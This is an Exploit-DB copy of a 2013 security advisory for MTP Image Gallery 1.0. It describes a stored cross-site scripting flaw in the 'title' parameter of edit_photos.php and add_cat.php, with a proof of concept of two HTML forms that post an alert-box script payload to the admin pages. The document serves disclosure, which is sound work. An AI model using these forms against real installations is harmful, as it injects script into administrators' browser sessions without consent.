MTP Image Gallery 1.0 edit_photos.php title param - XSS Vulnerability

ID EDB-ID:24544
Type exploitdb
Reporter LiquidWorm
Modified 2013-02-26T00:00:00


MTP Image Gallery 1.0 (edit_photos.php title param) - XSS Vulnerability. Webapps exploit for php platform


MTP Image Gallery 1.0 (title) Remote Script Insertion Vulnerability

Vendor: MTP Scripts
Product web page:
Affected version: 1.0

Summary: MTP Image Gallery offers more control, better
uploading and enhanced performance. With MTP Image Gallery
you can easily create and maintain albums of photos via an
intuitive, web interface.

Desc: MTP Image Gallery suffers from a stored XSS vulnerability
when parsing user input to the 'title' parameter via POST method
thru 'edit_photos.php' and 'add_cat.php' scripts. Attackers can
exploit this weakness to execute arbitrary HTML and script code
in a user's browser session.

Tested on: Linux, Apache2

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

Advisory ID: ZSL-2013-5130
Advisory URL:



<title>MTP Image Gallery 1.0 (title) Remote Script Insertion Vulnerability</title>
<form method="POST" action="http://localhost/gallery/admin/edit_photos.php?ID=39&action=edit">
<input type="hidden" name="title" value='"><script>alert(1);</script>' />
<input type="hidden" name="Filedata" value="" />
<input type="hidden" name="cats" value="12" />
<input type="hidden" name="status" value="1" />
<input type="hidden" name="full" value="1" />
<input type="hidden" name="views" value="1" />
<input type="hidden" name="rating" value="1" />
<input type="hidden" name="author" value="lqwrm" />
<input type="hidden" name="action" value="add" />
<input type="submit" value="XSS #1" />
<br /><br />
<form method="POST" action="http://localhost/gallery/admin/add_cat.php">
<input type="hidden" name="action" value="add" />
<input type="hidden" name="cats" value="1" />
<input type="hidden" name="full" value="1" />
<input type="hidden" name="title" value='"><script>alert(2);</script>' />
<input type="submit" value="XSS #2" />